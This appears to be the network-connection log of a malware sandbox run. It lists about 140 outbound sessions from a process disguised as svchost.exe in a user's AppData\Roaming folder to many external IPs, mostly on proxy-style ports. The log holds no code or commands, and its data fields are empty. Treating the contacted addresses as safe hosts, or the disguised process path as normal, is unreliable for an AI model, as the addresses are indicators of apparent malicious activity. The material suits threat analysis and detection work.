Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4512	192.168.2.5	63240	200.94.96.174	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4513	192.168.2.5	63127	161.97.163.52	45063	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4514	192.168.2.5	64078	159.65.77.168	8585	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4515	192.168.2.5	64122	23.227.38.230	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4516	192.168.2.5	64161	104.25.234.81	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4517	192.168.2.5	64145	147.124.212.31	30479	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4518	192.168.2.5	64167	104.20.103.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4519	192.168.2.5	64198	104.18.103.125	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4520	192.168.2.5	64104	52.151.210.204	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4521	192.168.2.5	64165	204.236.176.61	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4522	192.168.2.5	64076	47.243.114.192	8180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4523	192.168.2.5	64075	8.217.143.187	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4524	192.168.2.5	64216	104.17.132.79	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4525	192.168.2.5	63725	125.99.106.250	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4526	192.168.2.5	64109	121.128.194.154	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4527	192.168.2.5	64119	198.44.255.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4528	192.168.2.5	64157	44.190.9.65	48100	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4529	192.168.2.5	64127	51.15.212.207	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4530	192.168.2.5	64116	203.218.172.225	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4531	192.168.2.5	63614	72.210.252.137	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4532	192.168.2.5	63101	117.160.250.163	81	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4533	192.168.2.5	64114	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4534	192.168.2.5	64106	167.172.86.46	10471	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4535	192.168.2.5	64107	8.219.228.100	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4536	192.168.2.5	64143	20.37.207.8	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4537	192.168.2.5	64222	51.222.241.8	36219	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4538	192.168.2.5	64050	69.61.200.104	36181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4539	192.168.2.5	64148	51.210.223.9	3000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4540	192.168.2.5	64228	129.213.150.205	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4541	192.168.2.5	63980	111.16.50.12	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4542	192.168.2.5	62404	37.187.91.192	11721	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4543	192.168.2.5	64229	201.174.239.28	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4544	192.168.2.5	64086	3.10.93.50	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4545	192.168.2.5	64149	84.39.112.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4546	192.168.2.5	64250	203.30.188.247	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4547	192.168.2.5	64150	8.142.3.145	3306	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4548	192.168.2.5	64172	65.21.255.197	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4549	192.168.2.5	64155	83.243.92.154	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4550	192.168.2.5	64268	104.16.109.213	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4551	192.168.2.5	64224	8.218.231.62	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4552	192.168.2.5	64278	104.17.171.235	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4553	192.168.2.5	64137	52.172.1.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4554	192.168.2.5	64303	104.17.62.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4555	192.168.2.5	64206	47.93.121.200	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4556	192.168.2.5	63747	203.76.121.237	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4557	192.168.2.5	64310	159.65.77.168	8585	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4558	192.168.2.5	64207	43.255.113.232	84	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4559	192.168.2.5	63767	188.164.196.31	62966	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4560	192.168.2.5	64288	162.241.158.204	63360	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4561	192.168.2.5	64248	199.58.185.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4562	192.168.2.5	64322	104.16.104.12	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4563	192.168.2.5	64236	119.3.215.41	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4564	192.168.2.5	64225	185.189.100.200	11080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4565	192.168.2.5	64315	94.131.63.120	58378	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4566	192.168.2.5	64243	202.83.102.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4567	192.168.2.5	63370	92.204.134.38	59727	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4568	192.168.2.5	64331	104.25.167.88	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4569	192.168.2.5	64247	211.222.252.187	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4570	192.168.2.5	64285	46.17.63.166	10000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4571	192.168.2.5	64304	93.190.141.102	47851	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4572	192.168.2.5	64270	58.234.116.197	8197	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4573	192.168.2.5	64309	13.38.176.104	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4574	192.168.2.5	64340	172.67.254.127	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4575	192.168.2.5	64344	104.24.220.52	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4576	192.168.2.5	64253	45.11.95.165	5219	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4577	192.168.2.5	64323	150.230.96.150	19291	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4578	192.168.2.5	64294	85.214.118.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4579	192.168.2.5	64305	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4580	192.168.2.5	64256	203.95.198.170	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4581	192.168.2.5	64354	162.159.242.8	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4582	192.168.2.5	64361	162.214.170.144	37592	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4583	192.168.2.5	64254	116.199.168.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4584	192.168.2.5	64318	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4585	192.168.2.5	64316	43.128.107.251	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4586	192.168.2.5	64010	142.54.231.38	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4587	192.168.2.5	64398	172.67.181.20	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4588	192.168.2.5	64387	31.204.28.136	5432	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4589	192.168.2.5	64342	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4590	192.168.2.5	64384	38.162.13.126	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4591	192.168.2.5	63373	103.125.240.237	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4592	192.168.2.5	63814	101.255.167.142	3125	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4593	192.168.2.5	64410	185.162.228.154	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4594	192.168.2.5	64428	104.25.108.120	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4595	192.168.2.5	62514	92.204.136.149	16691	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4596	192.168.2.5	64263	83.143.24.66	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4597	192.168.2.5	64327	94.20.183.172	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4598	192.168.2.5	64315	94.131.63.120	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4599	192.168.2.5	64346	61.129.2.212	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4600	192.168.2.5	64353	5.58.47.25	3629	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4601	192.168.2.5	64345	103.178.194.190	1111	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4602	192.168.2.5	64484	104.25.64.27	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4603	192.168.2.5	64461	104.16.207.86	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4604	192.168.2.5	64435	129.213.150.205	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4605	192.168.2.5	64451	162.214.225.223	49556	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4606	192.168.2.5	64014	98.188.47.150	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4607	192.168.2.5	64436	92.204.135.37	58604	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4608	192.168.2.5	64440	201.174.239.28	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4609	192.168.2.5	64453	159.65.77.168	8585	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4610	192.168.2.5	64490	185.238.228.67	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4611	192.168.2.5	64452	184.170.248.5	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4612	192.168.2.5	64560	104.22.50.220	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4613	192.168.2.5	64367	103.49.202.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4614	192.168.2.5	62595	92.204.134.38	54467	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4615	192.168.2.5	64502	104.23.128.174	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4616	192.168.2.5	64510	104.20.178.166	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4617	192.168.2.5	64519	203.24.108.194	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4618	192.168.2.5	64520	104.17.166.210	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4619	192.168.2.5	64450	162.159.243.178	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4620	192.168.2.5	63889	16.162.211.90	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4621	192.168.2.5	64419	47.243.114.192	8180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4622	192.168.2.5	64543	104.16.105.142	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4623	192.168.2.5	64553	172.67.181.129	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4624	192.168.2.5	64536	162.214.225.223	48414	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4625	192.168.2.5	64422	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4626	192.168.2.5	64437	221.153.92.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4627	192.168.2.5	64429	192.169.205.131	35670	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4628	192.168.2.5	64441	198.44.255.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4629	192.168.2.5	64439	8.217.143.187	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4630	192.168.2.5	64491	92.204.135.37	62969	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4631	192.168.2.5	64424	51.83.140.70	8181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4632	192.168.2.5	63406	80.169.243.234	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4633	192.168.2.5	63401	37.187.77.58	29380	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4634	192.168.2.5	62482	139.198.120.15	29527	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4635	192.168.2.5	62512	213.136.78.200	19925	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4636	192.168.2.5	64546	104.45.128.122	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4637	192.168.2.5	64476	217.69.121.141	5806	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4638	192.168.2.5	64446	58.234.116.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4639	192.168.2.5	63984	186.96.50.20	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4640	192.168.2.5	64447	41.111.198.108	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4641	192.168.2.5	64455	121.128.194.154	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4642	192.168.2.5	64454	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4643	192.168.2.5	62572	91.134.140.160	16487	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4644	192.168.2.5	63409	45.117.179.240	8520	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4645	192.168.2.5	64513	93.190.142.57	26541	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4646	192.168.2.5	64499	139.162.181.177	60844	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4647	192.168.2.5	63951	106.14.255.124	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4648	192.168.2.5	64462	146.190.84.209	18255	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4649	192.168.2.5	64529	84.39.112.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4650	192.168.2.5	64511	20.206.106.192	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4651	192.168.2.5	64488	167.172.86.46	10471	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4652	192.168.2.5	64512	8.219.228.100	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4653	192.168.2.5	64381	112.30.155.83	12792	56176	C:\Users\user\AppData\Roaming\svchost.exe

